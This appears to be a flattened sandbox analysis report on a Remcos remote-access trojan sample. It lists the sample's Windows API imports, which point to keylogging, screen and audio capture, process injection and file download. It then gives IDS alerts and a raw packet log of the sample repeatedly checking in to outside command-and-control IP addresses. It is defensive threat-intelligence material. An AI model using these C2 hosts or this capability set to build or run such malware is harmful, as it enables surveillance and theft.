                                                RT_GROUP_ICON0x7dbc80x3edataEnglishUnited States0.8064516129032258
                                                DLLImport
                                                KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                                                USER32.dllGetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, DispatchMessageA, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, AppendMenuA, GetSystemMetrics, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetWindowThreadProcessId, MapVirtualKeyA, DrawIcon, GetIconInfo
                                                GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                                                ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                                                SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                                ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                                                SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                                                WINMM.dllwaveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader, waveInUnprepareHeader
                                                WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                                                urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                                gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                                                WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-29T16:49:09.576799+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454537101.99.93.1694899TCP
                                                2024-10-29T16:49:09.576799+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454520101.99.93.16955055TCP
                                                2024-10-29T16:49:18.331024+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449730101.99.93.16980TCP
                                                2024-10-29T16:49:18.338519+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449731101.99.93.1698080TCP
                                                2024-10-29T16:49:35.381112+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449734101.99.93.1694899TCP
                                                2024-10-29T16:49:35.387862+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449739101.99.93.1695000TCP
                                                2024-10-29T16:49:43.913837+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449740101.99.93.16955000TCP
                                                2024-10-29T16:50:00.911421+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449741101.99.93.16955055TCP
                                                2024-10-29T16:50:09.423220+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454242103.144.139.15780TCP
                                                2024-10-29T16:50:09.431846+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454244103.144.139.1578080TCP
                                                2024-10-29T16:50:17.927121+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.45429065.21.245.78080TCP
                                                2024-10-29T16:50:27.383706+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45433465.21.245.780TCP
                                                2024-10-29T16:50:36.882802+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454345101.99.93.16980TCP
                                                2024-10-29T16:50:36.889844+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454391101.99.93.1698080TCP
                                                2024-10-29T16:50:53.869680+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454437101.99.93.1694899TCP
                                                2024-10-29T16:50:53.897876+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454485101.99.93.1695000TCP
                                                2024-10-29T16:51:02.382671+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454519101.99.93.16955000TCP
                                                2024-10-29T16:51:11.199633+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454521103.144.139.15780TCP
                                                2024-10-29T16:51:11.207683+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454522103.144.139.1578080TCP
                                                2024-10-29T16:51:11.236421+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.45452365.21.245.78080TCP
                                                2024-10-29T16:51:12.129617+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45452465.21.245.780TCP
                                                2024-10-29T16:51:21.688865+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454525101.99.93.16980TCP
                                                2024-10-29T16:51:21.740518+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454526101.99.93.1698080TCP
                                                2024-10-29T16:51:30.229680+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454527101.99.93.1694899TCP
                                                2024-10-29T16:51:30.245474+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454528101.99.93.1695000TCP
                                                2024-10-29T16:51:38.736784+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454529101.99.93.16955000TCP
                                                2024-10-29T16:51:55.713142+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454530101.99.93.16955055TCP
                                                2024-10-29T16:52:04.217085+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454531103.144.139.15780TCP
                                                2024-10-29T16:52:04.233966+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454532103.144.139.1578080TCP
                                                2024-10-29T16:52:12.728864+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.45453365.21.245.78080TCP
                                                2024-10-29T16:52:22.077761+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45453465.21.245.780TCP
                                                2024-10-29T16:52:31.567828+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454535101.99.93.16980TCP
                                                2024-10-29T16:52:31.602991+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454536101.99.93.1698080TCP
                                                2024-10-29T16:52:40.151594+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454538101.99.93.1695000TCP
                                                2024-10-29T16:52:48.658785+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454539101.99.93.16955000TCP
                                                2024-10-29T16:53:05.647777+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454540101.99.93.16955055TCP
                                                2024-10-29T16:53:14.149902+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.454541103.144.139.15780TCP
                                                2024-10-29T16:53:14.162067+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.454542103.144.139.1578080TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 29, 2024 16:49:09.576798916 CET4973080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:09.794083118 CET8049730101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:09.794302940 CET4973080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:09.799679041 CET4973080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:09.805089951 CET8049730101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:18.330759048 CET8049730101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:18.331023932 CET4973080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:18.331023932 CET4973080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:18.332057953 CET497318080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:18.336529970 CET8049730101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:18.337403059 CET808049731101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:18.337513924 CET497318080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:18.338519096 CET497318080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:18.344180107 CET808049731101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:26.817687988 CET808049731101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:26.817780972 CET497318080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:26.817853928 CET497318080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:26.818372011 CET497344899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:26.823803902 CET808049731101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:26.823827028 CET489949734101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:26.823898077 CET497344899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:26.828351974 CET497344899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:26.835146904 CET489949734101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:35.381014109 CET489949734101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:35.381112099 CET497344899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:35.381304979 CET497344899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:35.381886005 CET497395000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:35.386778116 CET489949734101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:35.387432098 CET500049739101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:35.387501955 CET497395000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:35.387861967 CET497395000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:35.393407106 CET500049739101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:43.897056103 CET500049739101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:43.897147894 CET497395000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:43.902282953 CET497395000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:43.902972937 CET4974055000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:43.907802105 CET500049739101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:43.908670902 CET5500049740101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:43.908754110 CET4974055000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:43.913836956 CET4974055000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:43.919755936 CET5500049740101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:52.417965889 CET5500049740101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:52.418122053 CET4974055000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:52.418251038 CET4974055000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:52.419169903 CET4974155055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:52.423815012 CET5500049740101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:52.424576998 CET5505549741101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:49:52.424655914 CET4974155055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:52.428528070 CET4974155055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:49:52.433998108 CET5505549741101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:00.911293030 CET5505549741101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:00.911421061 CET4974155055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:00.911562920 CET4974155055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:00.912363052 CET5424280192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:00.917187929 CET5505549741101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:00.918061018 CET8054242103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:00.918159962 CET5424280192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:00.921581984 CET5424280192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:00.927006006 CET8054242103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:09.423064947 CET8054242103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:09.423219919 CET5424280192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:09.423356056 CET5424280192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:09.424340963 CET542448080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:09.429887056 CET8054242103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:09.431332111 CET808054244103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:09.431392908 CET542448080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:09.431845903 CET542448080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:09.437619925 CET808054244103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:17.918100119 CET808054244103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:17.918174028 CET542448080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:17.918216944 CET542448080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:50:17.919480085 CET542908080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:17.923856020 CET808054244103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:50:17.925578117 CET80805429065.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:17.925698996 CET542908080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:17.927120924 CET542908080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:17.933331966 CET80805429065.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:26.422391891 CET80805429065.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:26.423628092 CET542908080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:26.469743967 CET542908080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:26.477447987 CET80805429065.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:26.482376099 CET5433480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:26.487915993 CET805433465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:26.489559889 CET5433480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:26.517108917 CET5433480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:26.522593975 CET805433465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:27.379667997 CET805433465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:27.383706093 CET5433480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:27.383752108 CET5433480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:27.390062094 CET805433465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:50:27.391736984 CET5433480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:50:28.395276070 CET5434580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:28.400650978 CET8054345101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:28.403608084 CET5434580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:28.407064915 CET5434580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:28.412686110 CET8054345101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:36.882747889 CET8054345101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:36.882802010 CET5434580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:36.882869005 CET5434580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:36.883810043 CET543918080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:36.888341904 CET8054345101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:36.889427900 CET808054391101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:36.889509916 CET543918080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:36.889843941 CET543918080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:36.895719051 CET808054391101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:45.375185966 CET808054391101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:45.375240088 CET543918080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:45.375291109 CET543918080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:45.376008034 CET544374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:45.380975008 CET808054391101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:45.381304026 CET489954437101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:45.381422997 CET544374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:45.384929895 CET544374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:45.390294075 CET489954437101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:53.867182016 CET489954437101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:53.869679928 CET544374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:53.869679928 CET544374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:53.875178099 CET489954437101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:53.889539957 CET544855000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:53.895623922 CET500054485101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:50:53.897876024 CET544855000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:53.897876024 CET544855000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:50:53.903623104 CET500054485101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.375971079 CET500054485101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.376036882 CET544855000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.376053095 CET544855000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.376728058 CET5451955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.381640911 CET500054485101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.382175922 CET5500054519101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.382255077 CET5451955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.382671118 CET5451955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.387949944 CET5500054519101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.388009071 CET5451955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.388032913 CET5451955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.388053894 CET5500054519101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.388528109 CET5452055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.393271923 CET5500054519101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.393377066 CET5500054519101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.393821001 CET5505554520101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.393898010 CET5452055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.398654938 CET5452055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.399763107 CET5505554520101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.399813890 CET5452055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.399863005 CET5452055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:02.400321007 CET5452180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:02.404107094 CET5505554520101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.405230999 CET5505554520101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.405250072 CET5505554520101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:02.405828953 CET8054521103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:02.405915976 CET5452180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:02.410634041 CET5452180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:02.416037083 CET8054521103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.199392080 CET8054521103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.199632883 CET5452180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:11.199680090 CET5452180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:11.200107098 CET8054521103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.200155973 CET5452180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:11.200371981 CET545228080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:11.207285881 CET8054521103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.207307100 CET808054522103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.207393885 CET545228080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:11.207683086 CET545228080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:11.213587046 CET808054522103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.223979950 CET808054522103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:11.228776932 CET545238080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:11.234147072 CET80805452365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:11.236160040 CET545238080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:11.236421108 CET545238080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:11.243170023 CET80805452365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:11.243310928 CET80805452365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:11.268148899 CET5452480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:11.273608923 CET805452465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:11.275818110 CET5452480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:11.279213905 CET5452480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:11.284815073 CET805452465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:12.129440069 CET805452465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:12.129616976 CET5452480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:12.129616976 CET5452480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:12.135126114 CET805452465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:51:12.135217905 CET5452480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:51:13.182326078 CET5452580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:13.187886953 CET8054525101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:13.187978983 CET5452580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:13.191734076 CET5452580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:13.197314024 CET8054525101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.686796904 CET8054525101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.688864946 CET5452580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.701750040 CET5452580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.702682972 CET545268080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.707462072 CET8054525101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.707976103 CET808054526101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.709597111 CET545268080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.715379953 CET808054526101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.715441942 CET545268080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.740518093 CET545268080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.740561008 CET545268080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.742397070 CET545274899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.745887995 CET808054526101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.745989084 CET808054526101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.748018980 CET489954527101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:21.748101950 CET545274899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.752425909 CET545274899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:21.757843018 CET489954527101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:30.228318930 CET489954527101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:30.229680061 CET545274899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:30.237489939 CET545274899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:30.239126921 CET545285000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:30.243021965 CET489954527101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:30.244702101 CET500054528101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:30.244818926 CET545285000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:30.245474100 CET545285000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:30.250895977 CET500054528101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:38.729943037 CET500054528101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:38.730066061 CET545285000192.168.2.4101.99.93.169
